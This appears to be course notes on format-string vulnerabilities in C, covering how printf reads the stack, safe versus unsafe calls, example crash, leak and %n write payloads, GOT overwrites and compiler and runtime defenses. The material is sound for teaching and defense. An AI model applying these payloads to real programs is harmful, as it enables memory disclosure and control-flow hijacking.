Format-String Vulnerabilities
Buffer overflows get all the press, but format-string bugs are just as dangerous and far sneakier. A single misplaced printf(user_input) — instead of the safe printf("%s", user_input) — hands an attacker a general-purpose read/write primitive over the entire process address space. Real-world exploits have used this class of bug to leak stack canaries and ASLR bases, overwrite GOT entries, and gain shells.
Background: how printf works internally
printf is a variadic function: int printf(const char *format, ...). The ... means it accepts any number of additional arguments. Internally, it walks the format string character by character. Whenever it sees a % followed by a conversion specifier (d, s, x, n, …), it calls va_arg() to fetch the next value from the caller's stack and formats it.
The critical diagram from the slides shows the 32-bit stack layout when printf("ID: %d, Name: %s, Age: %d\n", id, name, age) is called:
| Stack slot (higher → lower) | Contents |
|---|---|
| age | 3rd optional argument |
| name (pointer) | 2nd optional argument |
| id | 1st optional argument |
| address of format string | the format parameter |
| return address of printf | (printf's own frame below) |
va_arg() simply increments the va_list pointer upward by the size of the expected type. It has no way to know when it has run out of real arguments. If the format string contains more specifiers than arguments provided, va_arg() just keeps reading whatever is on the stack above the format string pointer — data belonging to the caller's frame.
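The walk described above can be sketched with a toy formatter. This is a minimal illustration, not how any real libc implements printf: mini_format is a hypothetical name, it handles only %d, %s and %%, and it writes into a caller-supplied buffer instead of stdout.

```c
#include <stdarg.h>
#include <stddef.h>
#include <stdio.h>

/* Hypothetical toy formatter: understands only %d, %s and %%.
 * Writes a NUL-terminated result into out (capacity cap) and
 * returns the number of bytes stored, not counting the NUL. */
size_t mini_format(char *out, size_t cap, const char *fmt, ...)
{
    va_list ap;
    size_t used = 0;

    if (cap == 0)
        return 0;

    va_start(ap, fmt);
    for (const char *p = fmt; *p != '\0' && used + 1 < cap; p++) {
        int n = 0;

        if (*p != '%') {            /* ordinary character: copy it */
            out[used++] = *p;
            continue;
        }
        p++;                        /* move to the conversion specifier */
        if (*p == '\0')
            break;                  /* lone '%' at the end of the string */

        /* va_arg trusts the specifier: it cannot check that the caller
         * really passed an argument of this type, or any argument at all. */
        if (*p == 'd')
            n = snprintf(out + used, cap - used, "%d", va_arg(ap, int));
        else if (*p == 's')
            n = snprintf(out + used, cap - used, "%s", va_arg(ap, const char *));
        else if (*p == '%')
            out[used++] = '%';

        if (n < 0)
            break;
        /* snprintf reports the untruncated length; clamp to the buffer. */
        used = ((size_t)n >= cap - used) ? cap - 1 : used + (size_t)n;
    }
    va_end(ap);

    out[used] = '\0';
    return used;
}
```

Calling mini_format(buf, sizeof buf, "ID: %d, Name: %s, Age: %d\n", 7, "bob", 30) fills buf with the expected line. Nothing in the loop compares the number of specifiers with the number of arguments, which is exactly the gap the attacks below rely on.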
The vulnerability: user input as the format string
The bug is passing attacker-controlled data as the first argument:
// VULNERABLE
printf(user_input); // user_input IS the format string
// SAFE
printf("%s", user_input); // user_input is just a string to print
The same problem arises when user data is spliced into a format string before printing:
// Also vulnerable: user_input ends up embedded in the format string
sprintf(format, "%s %s", user_input, ": %d");
printf(format, program_data);
When user_input contains format specifiers like %x or %n, printf treats them as real conversion directives and acts on stack memory the attacker never supplied as an argument.
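A safe counterpart to both patterns keeps the format string a literal and passes user data only as an argument. The sketch below assumes two hypothetical helpers, format_user_safely and format_record, that write into a caller-supplied buffer; the "%s : %d" layout mirrors the string the spliced example above would have built.

```c
#include <stddef.h>
#include <stdio.h>

/* Hypothetical helper: copy user_input into out as plain data.
 * The format string is a literal, so specifiers inside user_input
 * are never interpreted. */
int format_user_safely(char *out, size_t cap, const char *user_input)
{
    return snprintf(out, cap, "%s", user_input);
}

/* Hypothetical helper: safe replacement for splicing user_input into a
 * format string. Both values are passed as arguments to one literal format. */
int format_record(char *out, size_t cap, const char *user_input, int program_data)
{
    return snprintf(out, cap, "%s : %d", user_input, program_data);
}
```

With these helpers an input such as %x.%x.%n comes out byte for byte as it went in, because printf-family functions only parse the first (literal) argument for directives.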
Attack 1 — Crash the program
Send a string full of %s specifiers: %s%s%s%s%s%s%s%s%s. For each %s, printf reads the next stack word and treats it as a pointer to a string. Most of those words are not valid addresses, so as soon as printf dereferences one the program crashes with a segmentation fault. This is the simplest attack: denial of service.
Attack 2 — Read arbitrary stack memory
%x (or %p) prints the next stack word as a hex integer without dereferencing it. Chain them to walk up the stack:
$ ./vul
Please enter a string: %x.%x.%x.%x.%x.%x.%x.%x
63.b7fc5ac0.b7eb8309.bffff33f.11223344.252e7825.78252e78.2e78252e
The fifth value, 11223344, is the local variable var = 0x11223344 from the caller's frame, leaked even though it was never passed to printf. The number of %x tokens needed is determined by the number of 4-byte stack words between the va_list starting position and the target value. Finding it is trial and error (or GDB inspection).
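The over-read can be modelled without invoking undefined behavior. The sketch below is a simulation only: simulate_leak is a hypothetical function, and the array passed to it stands in for the 4-byte words above the format pointer (the usage note reuses the first five words from the sample output above). Each %x consumes the next word, just as va_arg would.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Toy model of the leak: 'stack' plays the role of the words that sit
 * above the format-string pointer. Each %x prints the next word in hex;
 * every other character is copied verbatim. Returns bytes stored. */
size_t simulate_leak(const uint32_t *stack, size_t nwords,
                     const char *fmt, char *out, size_t cap)
{
    size_t used = 0, next = 0;

    if (cap == 0)
        return 0;

    for (const char *p = fmt; *p != '\0' && used + 1 < cap; p++) {
        if (p[0] == '%' && p[1] == 'x') {
            if (next == nwords)
                break;  /* the model stops here; a real printf keeps reading */
            int n = snprintf(out + used, cap - used, "%x",
                             (unsigned)stack[next++]);
            if (n < 0)
                break;
            used = ((size_t)n >= cap - used) ? cap - 1 : used + (size_t)n;
            p++;        /* skip the 'x' */
        } else {
            out[used++] = *p;
        }
    }
    out[used] = '\0';
    return used;
}
```

Feeding it the words 0x63, 0xb7fc5ac0, 0xb7eb8309, 0xbffff33f, 0x11223344 with the format %x.%x.%x.%x.%x reproduces the first five fields of the sample output: the fifth %x is the one that lands on var.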
%s goes further: it treats the stack word as a pointer and prints the null-terminated string at that address. This leaks arbitrary memory — not just stack values. A carefully chosen pointer can dump a password buffer, a stack canary, or a libc code pointer (defeating ASLR).
Why this matters for bypassing mitigations: leaking a stack canary lets you bypass stack canary protection; leaking a code pointer (e.g., a printf@GOT entry) reveals the libc base and defeats ASLR — both are standard first steps in modern exploit chains.
Attack 3 — Write to arbitrary memory with %n
%n is the dangerous one. It writes an integer — the number of characters printed so far — into the memory address pointed to by the next va_list value:
int i;
printf("hello%n", &i); // after this, i == 5
To exploit this, the attacker must get the target address onto the stack (e.g., by embedding it at the start of the input buffer, which is part of fmtstr()'s frame):
$ echo $(printf "\x04\xf3\xff\xbf").%x.%x.%x.%x.%x.%n > input
Breaking this down:
- \x04\xf3\xff\xbf: the address of var (0xbffff304, in little-endian byte order), placed at the start of input so that it sits in the stack frame.
- %x.%x.%x.%x.%x: five %x specifiers that advance va_list until it points at that address.
- %n: writes the number of characters printed so far into *0xbffff304, i.e. into var.
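The layout just described can also be assembled in code, which makes the byte order explicit. This is a sketch under the same 32-bit assumptions as the shell command; build_write_payload is a hypothetical helper, and the number of %x skips still has to be found per target.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: lay out <addr as 4 little-endian bytes>,
 * then 'skips' copies of ".%x", then ".%n".
 * Returns the payload length, or 0 if out is too small.
 * The result is raw bytes and is not NUL-terminated. */
size_t build_write_payload(unsigned char *out, size_t cap,
                           uint32_t addr, size_t skips)
{
    size_t used = 0;

    /* 4 address bytes + 3 bytes per ".%x" + 3 bytes for ".%n" */
    if (cap < 7 || skips > (cap - 7) / 3)
        return 0;

    for (int i = 0; i < 4; i++)
        out[used++] = (unsigned char)(addr >> (8 * i));  /* low byte first */

    for (size_t i = 0; i < skips; i++) {
        memcpy(out + used, ".%x", 3);
        used += 3;
    }
    memcpy(out + used, ".%n", 3);
    used += 3;

    return used;
}
```

With addr = 0xbffff304 and skips = 5 the function emits the same 22 bytes as the echo command above.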
The value written equals the total number of characters printed before %n. You can control it precisely using field-width padding: %100x prints the integer using at least 100 characters, so combining padding with %n lets you write any small integer you choose.
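The effect of padding on the stored count can be checked with a legitimate use of %n. The sketch assumes a libc that still honors %n for literal format strings (glibc does; some hardened C libraries reject %n entirely), and count_after_padding is a hypothetical helper name.

```c
#include <stdio.h>

/* Returns the value %n stores after printing 'value' in hex with a
 * minimum field width of 'width', or -1 on failure. */
int count_after_padding(int width, unsigned value)
{
    char buf[512];
    int count = -1;

    /* Keep the padded output inside buf so nothing is truncated. */
    if (width < 0 || width >= (int)sizeof buf)
        return -1;

    /* %*x takes the field width from the argument list. */
    if (snprintf(buf, sizeof buf, "%*x%n", width, value, &count) < 0)
        return -1;

    return count;
}
```

A width of 100 yields a count of 100 regardless of the value printed, as long as the value needs fewer than 100 hex digits. A width smaller than the natural length is ignored, so printing 0x2a with width 1 still stores 2.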
Targeting the GOT
The Global Offset Table (GOT) holds run-time addresses of shared-library functions. If you overwrite the GOT entry for exit (or any function called after your payload) with the address of system() or your shellcode, the next call to that function redirects to your target. Because the GOT sits at a fixed, known address in a non-PIE binary (and at a recoverable one once an address has been leaked), it is the classic %n target for control-flow hijacking via format strings.
Format specifier quick reference
| Specifier | Action | Attack use |
|---|---|---|
| %x / %p | Print next stack word as hex | Leak stack contents |
| %s | Dereference stack word as char * | Leak arbitrary memory |
| %n | Write character count to pointed address | Arbitrary memory write |
| %k$x | Direct parameter access: skip to the k-th argument | Target a specific stack slot precisely |
| %Nx | Print with field width N (pads output) | Control the value written by %n |
Direct parameter access (%k$x syntax) lets you skip straight to the k-th argument without burning multiple %x tokens. For example, %5$x reads the 5th argument directly. Combined with %5$n, you can write to the address held in the 5th stack slot in a single, compact payload.
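Direct parameter access is easiest to see in a benign call. The k$ syntax is a POSIX extension rather than ISO C, so this sketch assumes a POSIX libc such as glibc; swap_order is a hypothetical helper.

```c
#include <stddef.h>
#include <stdio.h>

/* Prints the two strings in reverse argument order:
 * %2$s selects the second variadic argument, %1$s the first. */
int swap_order(char *out, size_t cap, const char *first, const char *second)
{
    return snprintf(out, cap, "%2$s %1$s", first, second);
}
```

Calling swap_order(buf, sizeof buf, "world", "hello") produces "hello world". In an attack the same indexing points at a stack slot the caller never passed, which is why a single %5$n can replace a run of %x tokens followed by %n.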
Defenses
| Defense | How it helps |
|---|---|
| Always use printf("%s", user_input) | User data is never parsed as a format string |
| Compiler -Wformat-security / -Wformat=2 | Warns (or errors, with -Werror=format-security) when a non-literal format string is passed to printf-family functions |
| _FORTIFY_SOURCE=2 (glibc) | Routes printf-family calls to checked variants that abort when %n appears in a format string held in writable memory |
| Full RELRO | Makes the GOT read-only at load time, blocking %n-based GOT overwrites |
| ASLR + PIE | Forces attackers to leak addresses before writing — raises the bar but does not eliminate the bug |
The most important defense is the simplest: never pass user-controlled data as the format argument. All other defenses are mitigations that reduce exploitability after the bug is introduced.
Key takeaways
- A format-string vulnerability exists whenever attacker-controlled data reaches the format-string position of printf, sprintf, fprintf, or related functions.
- %x/%p leaks stack words as integers; %s dereferences a stack word as a pointer and prints memory at that address.
- %n writes the character count so far to a pointed-to address, turning the bug into an arbitrary write primitive.
- Field-width padding (e.g. %100x) and direct parameter access (%k$n) give precise control over the value written and the target slot.
- Common exploit targets include stack secrets (canaries), code pointers (to defeat ASLR), and GOT entries (to redirect function calls for control-flow hijacking).
- The fix is one line: use printf("%s", user_input), never printf(user_input). Building with -Wformat-security flags the pattern at compile time, and _FORTIFY_SOURCE=2 stops some %n writes at run time.